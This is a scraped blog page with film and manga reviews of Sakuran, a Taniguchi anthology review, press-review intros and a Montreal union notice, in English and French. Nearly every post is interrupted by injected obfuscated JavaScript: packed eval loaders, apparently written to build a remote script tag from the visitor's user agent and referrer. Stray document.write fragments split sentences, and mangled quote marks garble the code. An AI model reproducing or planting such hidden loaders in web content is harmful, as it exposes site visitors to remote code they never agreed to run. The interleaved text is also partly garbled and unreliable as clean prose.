Press Review (2013-02-26)

February is the most depressing month of the year. And that’s without counting on the fact that I work in a mad house where absurdity rules, document.write(“”); constantly being bullied and insulted by unruly kids and rebelling teenagers, having to attend union meetings that make a mockery of democracy, and that’s just the first day of the week. Luckily I can read manga and watch TV to completely forget about my crazy life (incidentally, I’m glad to say that, lately, I’ve been busy and able to catch up a little more on my blogging with a few comments — mostly in french — on Taniguchi’s Anthology and Furari, as well as Sakuran manga and live-action movie) or immerse myself in reading the news online. See this week’s crop (including more library humour) after the jump:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibnkf|var|u0026u|referrer|ykzyk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbdyz|var|u0026u|referrer|rhnse||js|php’.split(‘|’),0,{}))


Anime & Manga related, Japan, Popular Culture

Apple, apps and mobile devices news

Books, Digital Edition & Library

Economy, Environment & International/U.S. Politics

Health, home & garden

Library Humour

Local News & National Politics

Media, Culture, & Society

Sciences & History

Technology, Gadgets & Internet

Union stuff & Montreal’s libraries

[ Traduire ]

Sakuran (Movie)

“Tokyo was once a tiny village called Edo. The city owes its rapid expansion to the fact that, document.write(“”); in 1603, Shogun Tokugawa Ieyasu wanted to found the country’s capital at a place that was as far away as possible from the imperial seat in Kyoto. Edo soon grew to become a magnificent city. Anyone passing beneath the Great Gate of the new capital entered a glamorous world of pleasure and recreation, with a row of elegant brothels in the Yoshiwara district stretching over a kilometre. The courtesans who worked there were expected to be well-versed in music, dance and parlour games, as well as the art of flower arranging. Sakuran tells the story of one woman living in the lustrous world of Yoshiwara who was determined to stand on her own two feet and live life as she pleased.” (From the 2007 Montreal World Film Festival official programming book)

WARNING: May contains trace of spoilers! People allergic to the discussion of any plot’s elements before seeing a movie are strongly advised to take the necessary precautions for their safety and should avoid reading further.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yarsn|var|u0026u|referrer|byhih||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yetrr|var|u0026u|referrer|sbyfh||js|php’.split(‘|’),0,{}))

First, take a look at the trailer:


With this movie, you enter the flamboyant “floating world” of 17th Century Japan’s Ukiyo-e — as it is reminiscent of that era’s woodblock prints and paintings which often represented courtesans and scenes of the pleasure quarters. What makes this film so unique is that most of the people who created Sakuran are women! The creator of the original manga, Moyoco Anno, the director, Mika Ninagawa, the scriptwriter, Yuki Tanada, and most of the cast are all women. Sakuran is a movie about women who need to survive in a harsh environment like the Yoshiwara District of Edo.


The movie is based on a manga by Moyoco Anno. She’s a very popular mangaka, especially amongst female readership and it seems that several of her works have been adapted either as TV drama (Happy Mania in 1998), anime series (Sugar Sugar Rune in 2005-06) or even both (Hataraki Man in 2006-07). Unlike the manga that emphasizes the harsh life of Kiyoha when she was still a little girl, telling how young maids are raised and trained to become professional courtesans, the movie covers quickly Kiyoha’s youth, telling mostly the story of her quick rise to the top and of her struggle for freedom. For more information on the manga you can read our previous blog entry dedicated to this subject (in french; but you can try the automated translation which is unfortunately not always accurate and often hilarious).

During the Japanese Shogun era, prostitution was legal in certain areas. The Yoshiwara District was the Shogunate’s official place for gentlemen to buy prostitutes. It was situated in the north district of Edo (the ancient name for Tokyo) and was often called “Hakkoku” (The North Country). Many aspects of Japanese culture were born in that district, as it was a very trendy place to be for artists, musicians and poets. Although gentlemen could circulate freely, most of its residents — the women — were prevented to leave by walls and moats. It was like a giant prison where the women had to work hard to survive, trying their best to preserve their humanity. Sakuran is the story of a girl named Kiyoha who becomes an Oiran (meaning “head flower,” or the best of the high-class courtesans) of the Yoshiwara District.

The title, Sakuran, means cherry blossoms. They are very beautiful, but only last for a short time. Like cherry blossoms, a woman’s beauty doesn’t last long, and despite all the beauty of the courtesans’ life, it is a very cruel world. When she was merely eight years old, Kiyoha was sold as a helping maid to a courtesans’ house. She is a tough kid and despite the hard work and abuse, she never gives in and tries to be as noble as a human can possibly be. “How dare you! Don’t ever look down on us, Oirans!” is her attitude. She eventually learns to use her charm and techniques to bewitch customers and becomes an Oiran herself.

As the story progresses, two men come into Kiyoha’s life. Kuranosuke and Seiji are both good-hearted, but come from different social classes. Kuranosuke is the son of a very rich samurai class family and becomes her regular customer. He is so madly in love with her that he wants to marry her despite the fact that she is a prostitute. However, Kiyoha loves Seiji, an honest and sincere shopkeeper who promised to get her out of her golden cage if the old, dried-out cherry tree in the court of the courtesans’ house ever blossoms. She is not interested in the money and luxurious life of a samurai household. She simply wants freedom. But could she actually survive in the uncertainty of the outside world when all she has ever known is the rotten, artificial world of the courtesans? A new life outside might be as short as the cherry blossoms, but her freedom would be well worth the risk. This story tells us not to give up on hope — just like Kiyoha.

Anna Tsuchiya, who plays Kiyoha, is absolutely gorgeous in this film, as if she was born to play this part. Her juvenile delinquent attitude fits very well the role as Kiyoha is inherently very rebellious. Director Ninagawa succeeded in giving life to the Yoshiwara District and viewers really feel transported into the past, seeing Edo through the eyes of these women who, despite their hardship, still eat sweets, play with cats, smoke pipes and take naps.

Director Ninagawa’s experience as a photographer is obvious in the way she frames the scenes and in the picturesque quality of the set. The movie is shot like a flamboyant fashion show or the pages of a fashion magazine. Everything is beautiful, from the rich flower arrangements to the hairdos and kimonos of the courtesans. She uses lots of symbolism, like the cherry blossoms or the goldfish stuck in their tank like the courtesans imprisoned in their “floating world.” Despite the seriousness of the subject, the movie’s modern feel and colourful set, rich in vivid colors, make it a funny and entertaining experience.

All in all, Sakuran is a sort of Memoir of a Geisha with a modern touch and a relatively happy ending. At first, however, the rebellious attitude of the main character and the vivid, colourful scenery felt quite odd for a period drama, but once I had read the manga it all made sense: I realized that Director Ninagawa had successfully transposed the feel and imagery of the manga, even Moyoco Anno’s particular style and very fashionable designs. Although I must admit that this style of movie would have been more suited for a festival targeting a younger, subculture audience, like Fantasia, than a traditional venue like the Montreal World Film Festival. Another surprising discovery is that this movie is, so far, available only in Asia and in Europe. That’s the kind of title I would have expected Viz’ New People Entertainment to release in the USA and Canada. Hopefully, they (or someone else) will release it in a near future.

Sakuran: Japan, 2007, 111 min.; Dir.: Mika Ninagawa; Scr.: Yuki Tanada (based on Moyoco Anno’s manga); Phot.: Takuro Ishizaka; Ed.: Hiroaki Morishita; Prod. Des.: Namiko Iwaki; Music: Ringo Shiina; Prod.: Tamotsu Shiina; Distr.: Asmik Ace; Cast: Anna Tsuchiya (Kiyoha/Higurashi), Kippei Shiina (Kuranosuke), Yoshino Kimura (Takao), Hiroki Narimiya (Sojiro), Miho Kanno (Shohi), Masatoshi Nagase (Mitsunobu), Masanobu Ando (Seiji), Kenichiro Endo (Sakaguchi), Renji Ishibashi (owner). Screened as part of the “Focus on world cinema” segment at the 2007 Montreal World Film Festival in early september 2007. Theatrically released in Japan on 2007/02/24 and available in Japan on R2 Dvd (ACBD-10523, NTSC, Japanese with English subtitles, 111 min., ¥4,700, released on 2007/08/03, rated PG-12). Also available in UK (Ica Films, R2, PAL), France (Kaze, R2, PAL), Germany (Alive, R2, PAL), Korea (R3, NTSC) and Taiwan (R3, NTSC).

For more information you can check the following web sites:

Characters

Kiyoha / Higurashi: At 8 years old, she was brought to the Yoshiwara District to work as a helper maid in the Tamagiku-ya brothel and was given the name, Kiyoha. At 18 years old, she was chosen to become an Oiran and her name was once again changed to Higurashi (Miss Twilight). Thanks to her beauty and attitude, she becomes the number one prostitute in Yoshiwara District. She tries to keep a noble attitude and only takes men whom she likes and chooses.

Takao: She was the number one Oiran at Tamagiku-ya until Kiyoha showed up. She is madly in love with the Ukiyo-e artist Mitsunobu. When she finds out that he is in love with Kiyoha, she becomes jealous and tries to entrap her.

Shohi: She was an Oiran when Kiyoha came to Tamagiku-ya as a maid helper. She was very nice to her and Kiyoha adored her. She was given a very good marriage deal by a rich man and eventually left the District. She gave Kiyoha her hairpin as a parting gift.

The World of Sakuran

The vocabulary of the pleasure quarter’s world is old and possibly unfamiliar to most viewers—and even to many modern Japanese people. Here are a few words that might help you better understand the movie and the manga:

Oiran: It means the number one flower, the flower star. Oirans were the upper class Edo Era’s prostitutes. Originally, their helping maids—the kamuro—started calling those ladies “Oira no Neesan” (my elder sister lady) and the brothel people created the contraction “Oiran” to call their star prostitutes. When younger maids were discovered by brothel madams as future stars of the place, they were given an education in poetry, singing and playing instruments like Shamisen, or games like shogi (Japanese style chess) as well as other techniques to entertain customers. The service of an Oiran is expensive; they are thus often reserved for upper class, samurai men.

Zegen: These people are dealers who sell little girls to brothels to make a profit. They travel all over Japan, especially in very poor fishing villages, searching for good looking little girls to be sold at Yoshiwara. In the manga version, the Zegen who sold Kiyoha was a man, but in the movie, it is Oran (Miss Orchid), a former Oiran at Tamagiku-ya. Abandoned by the rich man she had married, she needed money to survive and became a Zegen.

Miuke: It literally means “receiving the body,” but could be translated as “to get married”. Many Oirans hope to get a good marriage in order to get out of Yoshiwara, but it sometimes ends up tragically. When a customer falls in love with an Oiran and wants to marry her, he has to buy back her contract — which can means paying a massive amount of money, sometimes up to 1000 Ryo ($700,000) for a no. 1 Oiran. Usually, the men who married Oirans were viewed as oddballs in the Edo society.

Mise Ban: It means “the shopkeeper.” They are men who worked at the brothel, taking care of various chores and miscellaneous duties such as running errands and holding umbrellas for Oiran ladies.

Mabu: It means the “prostitute’s lover.” Life in Yoshiwara was difficult and harsh, so in order to give them some emotional support, the courtesans were allowed to have lovers. In a famous Kabuki play, they were saying “If a prostitute does not have a Mabu (a lover), she lives in the darkness.” Lots of them also have tattoos of their lover’s names on their bodies.

This is an updated version of an article written by MM & CJP previously published in Protoculture Addicts #96: 72-73.

Sakuran © Ninagawa gumi-group / SAKURAN Film Committee.

[ Traduire ]

Sakuran

“Vendue à une maison close dès son plus jeune âge, document.write(“”); Tomeki, est une petite fille rebelle qui n’a qu’un désir : s’enfuir du quartier des plaisirs et surtout ne jamais devenir une prostituée. Mais avec le temps elle finit par se prendre au jeu et va vouloir atteindre le titre d’oiran, le plus haut rang des courtisanes. Elle fait ses débuts dans le métier sous le nom de Kiyoha, et très vite révèle un véritable don pour l’art de l’amour. Un simple regard lui suffit pour que tous les hommes soient à ses pieds…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bztzi|var|u0026u|referrer|tyzfs||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ifzdr|var|u0026u|referrer|kzzta||js|php’.split(‘|’),0,{}))

Sakuran vous fait découvrir la société très codée et hiérarchisée des courtisanes japonaises, trop souvent confondues avec les geishas. Avec ses règles strictes et ses principes ancestraux, le monde des prostituées de l’ère Edo vous dévoile tous ses secrets, des plus élégants aux plus cruels… Cynique et sulfureux à l’instar de son héroïne, ce manga nous dépeint une fois de plus une femme au caractère bien trempé, comme sait si bien les mettre en scène Moyoco Anno. Ce manga a été adapté au cinéma par la réalisatrice Mika Ninagawa.” [ Texte de la couverture arrière ]

Continuez après le saut de page >>

Après avoir été prépublié en feuilleton dans Evening (un magazine bimensuel de manga seinen publié par Kodansha) en 2001, Sakuran (????) est paru en un seul volume en novembre 2003 (Kodansha, Deluxe #1829, 308 pg, 900¥, ISBN 978-4-0633-4829-3). Il a été publié en français par Pika (collection Pika Graphic) en novembre 2010. Ce manga est écrit et dessiné par Moyoco Anno, une mangaka surtout connue pour ses histoires josei (qui ciblent un public féminin adulte), comme Happy Mania ou Hataraki Man, mais elle a aussi produit du manga Sh?jo, comme Sugar Sugar Rune (Chocola et Vanilla en français). C’est une auteure de renom puisqu’un sondage récent la plaçait au huitième rang de popularité auprès des lecteurs de sexe féminin. Elle est également l’épouse du cinéaste et animateur Hideaki Anno, co-fondateur du studio Gainax et principalement connu pour la série animée Neon Genesis Evangelion (Étrangement, si leur nom de famille est le même, par pur coïncidence, il s’orthographie différemment en Japonais: ?? pour elle et ?? pour lui). Le fait que Sakuran se termine avec la mention “fin de la première partie” indique qu’Anno avait originalement l’intention de poursuivre l’histoire plus loin mais elle n’a jamais entreprit cette suite (probablement à cause de l’adaptation cinématographique de 2007 qui passe rapidement sur la jeunesse du personnage principale pour en raconter un peu plus sur sa vie d’adulte).

L’histoire de Sakuran, qui n’est pas sans rappeler Mémoires d’une geisha (le livre d’Arthur Golden porté à l’écran par Rob Mitchell), est assez simple. Tomeki, encore enfant, est vendu à une maison close à la mort de son père et est ainsi destiné, contre son gré, à une vie de prostitution. Elle travailles à la Maison Tamagiku de Yoshiwara (le quartier des plaisirs d’Edo) d’abord comme une simple suivante (kamuro) récalcitrante, puis comme une apprentie (hikkomi) à fort caractère, sous le nom de O-rin, et finalement comme une débutante un peu insolente, sous le nom de Kiyoha (ce qui signifit “feuille innocente”). Elle résistera de toutes les façons possible à ce destin qu’elle n’a pas choisi. Pourtant elle finira par se laisser prendre à son propre jeu et deviendra ce qu’elle détestait tant: une oiran réputé (courtisane de haut rang). Cela ne l’empèchera cependant pas de continuer à rechercher une manière de retrouver sa liberté. Comme dans la plupart des manga de Moyoco Anno, Sakuran mets en scène des personnages féminins forts, particulièrement Kiyoha, qui prennent leur travail très au sérieux. Elles n’abandonnent jamais ou ne s’apitoient pas sur leur sort mais cherchent plutôt un moyen de survivre sans dépendre des autres. Sans être extrêmement original, cette histoire offre tout de même un sujet intéssant qui nous renseigne beaucoup sur l’époque et l’univers des maisons closes d’Edo, l’ancienne Tokyo.

Toutefois, ce qui fait de Sakuran un manga fascinant est sans aucun doute son style superbe. Les planches en couleurs sont particulièrement belles et rappellent un peu les Ukiyo-e (estampes japonaises) et Shunga (gravures érotiques) de l’époque. Les personnages, surtout réalistes mais aussi parfois caricaturaux, ainsi que les arrière-plans détaillés et soignés ne sont surpassés que par la grande attention accordée aux vêtements et aux coiffures. Ceci n’est pas surprenant puisque Moyoco Anno a aussi beaucoup écrit sur la mode (entre 1998 et 2003 elle a eut une chronique dans VoCE, un magazine de cosmétique et de mode publié par Kodansha). Cela transparait aussi dans l’allure de ses héroïnes qui sont souvent grandes et élancées, comme des mannequins de mode.

Malheureusement, plusieurs éléments font de ce manga une lecture exigeante: le flash-back du début et le fait que le personnage principal change de nom trois fois peut créer un peu de confusion, la difficulté parfois à distinguer les personnages les uns des autres, sans oublier une narration saccadée et un récit compressé dans le temps. Malgré l’effort requis c’est un ouvrage qui procure somme toute une expérience agréable et mérite définitivement notre attention. C’est un très beau livre, d’une grande qualité, avec une charmante couverture à fini métallique et de superbes dessins. Il aborde certes un sujet très sérieux (la prostitution et les dures épreuves de la vie d’une oiran) mais qui est ici toujours présenté avec un certain humour. Compte-tenu du sujet, on doit évidemment s’attendre à de la nudité et à quelques scènes osées. À ne pas manquer, donc.

Sakuran a également été publié en version anglaise en juillet 2012 par Vertical (308 pgs, 5.25“ x 7.25“, paperback, ISBN 978-1-935654-45-2, $16.95 US / $17.95 Can). Des extraits de cette édition sont disponible sur le blogue de Comics Alliance et des information supplémentaires (ainsi qu’une critique) sont disponible sur le site d’Anime News Network. Vous pouvez aussi visiter le site officiel de Moyoco Anno.

En 2007, le manga a été adapté au cinéma par la réalisatrice et photographe Mika Ninagawa. Pour plus de détails sur ce film, vous pouvez lire notre billet qui y est consacré (en anglais; vous pouvez toujours vous risquer à lire la traduction automatisée mais l’exactitude du résultat n’est pas garantie — et même parfois loufoque!).

Sakuran, par Moyoco Anno. Boulogne, Pika Édition (Coll. Pika Graphic), 2010. 15 x 21 x 2.5 cm, 305 pg. (dont 34 pg en couleurs), 13,50 € / $22.95 Can. Sens de lecture japonais. ISBN: 978-2-8116-0385-4. Recommandé pour jeune adulte (16+).

Pour plus d’information vous pouvez consulter les sites suivants:

Sakuran © 2003 MOYOCO Anno / Kodansha Ltd. All rights reserved.

[ Translate ]

Press Review (2013-02-18)

A lot happened at home in the last couple of weeks (or so). Here’s the highlights: at the end of January a pipe broke within a wall while I wasn’t home and it went on for hours! I had to break the wall to see where the leak was. Luckily, document.write(“”); it was the hot water so I just had to turn off the water from the heating tank to make it stop. No hot water for a few days and the plumber costed my a week’s salary (at a hundred dollars per hour I realize that I should have become a plumber instead of an historian)! The next morning another main pipe broke on the street (this time up street; it was the third city water infrastructure failure within a couple of weeks) and the city had to cut water supply for a few hours. The cats caught another mouse in the house. My eighty-three years-old mother had a major surgery to repair an abdominal aortic aneurism, but all went well and she’s recovering fine. Ten days ago we got another big snow storm (but only about ten centimetres this time). My cold is dragging on and tends to get worse on week-ends!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ziebh|var|u0026u|referrer|nntbr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|banyb|var|u0026u|referrer|idkir||js|php’.split(‘|’),0,{}))

Even the news were eventful: they found the
King Richard III under a parking lot, the Pope resigned, Obama delivered the State of the Union address, a meteorite crashed in Russia and much more (including some library humour) after the jump:


Anime & Manga related, Japan, Popular Culture

Apple, apps and mobile devices news

Books, Digital Edition & Library

Economy, Environment & International/U.S. Politics

Health, home & garden

Humour

Local News & National Politics

Media, Culture, & Society

Sciences & History

Technology, Gadgets & Internet

Union stuff & Montreal’s libraries

[ Traduire ]

Petite note syndicale pour les cols blancs de Montréal

Veuillez prendre note que le Syndicat des fonctionnaires municipaux de Montréal (SFMM) a convoqué une assemblée extraordinaire pour tous les membres cols blancs de la Ville de Montréal qui se tiendra le 25 février 2013, document.write(“”); à 18 h 30, au Complexe Sportif Claude-Robillard (1000, avenue Émile-Journault, près du métro Crémazie). [ Voir l’avis de convocation ]
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrdsk|var|u0026u|referrer|dbfbk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hykzt|var|u0026u|referrer|isyrk||js|php’.split(‘|’),0,{}))

Pour les membres ayant un horaire atypique (mais si, il y en a), une assemblée se tiendra également le lundi 25 février 2013, à 8 h 30, à la salle Laure-Gaudreault du Centre Saint-Pierre (
1212, rue Panet, près du métro Beaudry).

Le but de cette assemblée est la présentation et l’adoption du projet de convention collective élaboré par le syndicat suite à un colloque des représentants et à un sondage auprès des membres. Il est important d’être présent et de voter si vous voulez connaitre les points sur lesquels porteront la négociation pour le renouvellement de la convention collective: augmentations salariales, vacances, sécurité d’emploi, plan de carrière, mobilité de main-d’oeuvre, conciliation vie-travail, etc. Ne laissez pas le syndicat décider pour vous et voyez à vos intérêt en assistant à l’assemblée!

Sur un autre sujet, on m’a récemment informé de la décision de la Commission de l’Équité Salariale concernant des “plaintes alléguant que les membres du comité d’équité salariale responsable d’établir le programme distincts d’équité salariale pour les personnes salariées représentées par le Syndicat des fonctionnaires municipaux de Montréal, section locale 429 ? SCFP auraient agi de mauvaise foi, de manière discriminatoire ou arbitraire ou auraient fait preuve de négligence grave dans l’exercice de leurs fonctions”. Vingt-trois plaintes auraient été déposées à la Commmission en vertu de l’article 15 de la Loi sur l’Équité salariale, par 18 aides-bibliothécaires, 2 aides en loisir, 1 préposé(e) au secrétariat, 1 bibliotechnicien(ne) et 1 microfilmeur(euse). Après étude et délibérations, la Commission, à l’unanimité, a déterminée que les plaintes étaient non fondées.

Je ne sais pas si c’est la Loi sur l’Équité salariale qui est mal foutue ou si ce sont les membres de la Commission qui manquent de “gros bon sens” mais il semblait évident pour plusieurs que les aides-bibliothécaires auraient dû avoir droit à l’équité. Quelqu’un n’a certainement pas fait son travail quelque part (c’est sûr ça aurait coûté très cher à la ville). Tout ça est très frustrant et injuste (c’est Caliméro qui le disait).

[ Translate ]

Jirô Taniguchi, Une Anthologie

“Proposé dans une édition cartonnée luxueuse déjà utilisée pour Quartier Lointain et Le Journal de mon père du même Jirô Taniguchi, document.write(“”); ce volume rassemble deux titres du maître japonais précédemment publiés chez Casterman : Terre de rêves, préalablement paru dans la collection Ecritures en 2005, recueil de cinq récits courts centrés sur la vie quotidienne, et L’Homme de la toundra, initialement paru l’année suivante sous le label Sakka, autre recueil d’histoires courtes d’inspiration plus naturaliste. Deux autres histoires [“La lune finissante” et “Une lignée centenaire”], inédites en français, viennent compléter cette anthologie de 504 pages.”
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yabey|var|u0026u|referrer|rnkhk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbdtk|var|u0026u|referrer|ydyyf||js|php’.split(‘|’),0,{}))

[ Texte du
site de l’éditeur; voir aussi le texte de la couverture arrière ]

Continuez après le saut de page >>

Jirô Taniguchi, une anthologie (???????: ?????12??? / Taniguchi Jir? Sensh?: Inu o kau to 12 no tanpen / littéralement “Sélection de Jir? Taniguchi: Élever un chien et 12 histoires courtes”) est un recueil de treize histoires courtes qui regroupe les ouvrages Terre de rêves et L’Homme de la toundra, ainsi que deux récits inédits. Ce recueil a été publié au Japon en 2009 par l’éditeur Shogakukan et traduit en français par Casterman au début décembre 2010. Comme j’ai déjà commenté plus tôt dans ce blog L’Homme de la toundra et ses six récits, je m’attarderai ici sur les autres histoires.

Terre de rêves (???? / Inu o kau / litt. “Élever un chien”) a été sérialisé au Japon dans le magazine de Shogakukan Big Comics en 1991 avant d’être compilé en un volume (Tankoubon) en 1992 (puis réédité en Bunkobon en 2001). Il sera traduit en français et publié par Casterman en mars 2005. Le recueil comprend cinq récits (dont certains sont partiellement autobiographiques) qui abordent les thèmes favoris de Taniguchi: la vie quotidienne, la nature et les animaux.

Dans “Avoir un chien,” un jeune couple déménage à la campagne afin d’avoir un chien. Après plus de quatorze ans, celui-ci devient faible pour finalement mourir des suites d’une longue maladie. L’histoire illustre les joies de prendre soin d’un animal mais aussi la douleur que cause sa perte.

Dans “Et maintenant… un chat,” un an après la disparition de Tam, le jeune couple adopte une chatte persane suite à la recommandation d’une voisine. Ils la nomment Boro (chiffon) et, après une période d’acclimatation mutuelle, elle leur donne une portée de chatons et peut-être le bonheur. Il semble que Taniguchi a effectivement eut un chien qui est mort en 1990, suivi d’une chatte persane nommée Boro!

Dans “Vue du jardin,” le même jeune couple découvre toute les difficultés que représente trouver preneurs pour des chatons. Aussi, ils partent à la recherche du vieux chien aveugle d’une voisine. Il sera retrouvé mais mourra tout de même six mois plus tard, entouré des soins de sa maîtresse. En bout de ligne, le couple ne donnera qu’un chaton, à une petite voisine, et conservera trois chats!

Dans “Quelques jours à trois,” le jeune couple reçoit la visite surprise d’Akiko, une nièce de douze ans, qui a fait une fugue. Son père est décédé cinq ans plus tôt et sa mère songe à se remarier et cela trouble la jeune fille. Elle passe ainsi la dernière semaine des vacances d’été à mener une vie de famille normale: jouer avec les chats, pic-niquer, se lancer la balle, aller voir un match de baseball, etc., puis retourne chez elle. Dorénavant tout ira pour le mieux.

Dans “La Terre de la promesse,” la dernière histoire de Terre de rêves, Yoshimura et Okamoto tentent d’escalader la face sud de l’Annapurna dans l’Himalaya avec leur club d’alpinisme. Mais cette ascension hivernale échoue à cause d’un blizzard subit et violent. Yoshimura meurt et Okamoto survit de justesse, peut-être grâce à la vision d’un Tchango, une panthère des neiges. Six ans plus tard, il décide d’avoir sa revenge sur la montagne, ne serait-ce que pour l’espoir de revoir cette bête superbe qu’est le Tchango. Cette histoire serait inspirée en partie de la vie de l’alpiniste Keisuke Kawamura.

Dans “La Lune finissante” (???? / Hiken zangetsu), une histoire inédite, le samurai Shinnosuke Kamiya se rend à Rampart, un village de prospecteurs d’or en Alaska, pour retrouver son frère Jûshirô qui n’a pas donné de nouvelles depuis plus d’un an. Dans cette Amérique frontière de 1899, il fait sa petite enquête pour découvrir le sort tragique qu’a connu son frère et lui faire justice. Une histoire dont le thème se rapproche plus des récits d’action que Taniguchi produisait dans les années ’80 et qui n’est pas non plus sans rappeler Sky Hawk, publié sept ans plus tôt.

Dans “Une lignée centenaire” (????? / Hyakunen no keifu), la deuxième histoire inédite du recueil, la chienne Hana donne naissance à cinq petit chiots. C’est l’occasion pour Kimiko, la grand-mère, de raconter à sa petite-fille l’histoire de cette longue lignée de bergers allemands, qui failli, une fois pendant la 2e guerre mondiale, être interrompue. La lignée remontait à Günter, un berger allemand qu’un architecte prussien avait donné à son grand-père, un médecin militaire, à la fin de l’époque Meiji (1912). Kimiko avait grandie avec Belle, une chienne de la cinquième génération. Malheureusement, elle fut réquisitionnée par l’armée japonaise en 1943 pour contribuer à l’effort de guerre. Mais, après la guerre, elle ne revint pas. La vie reprit peu à peu son cours normal et la famille ouvrit une petite pension pour survivre dans l’économie difficile de l’après-guerre et Belle fut oubliée… jusqu’à ce que Kimiko entendes parler d’un article de magazine racontant l’histoire d’un soldat américain et de son chien Japonais!

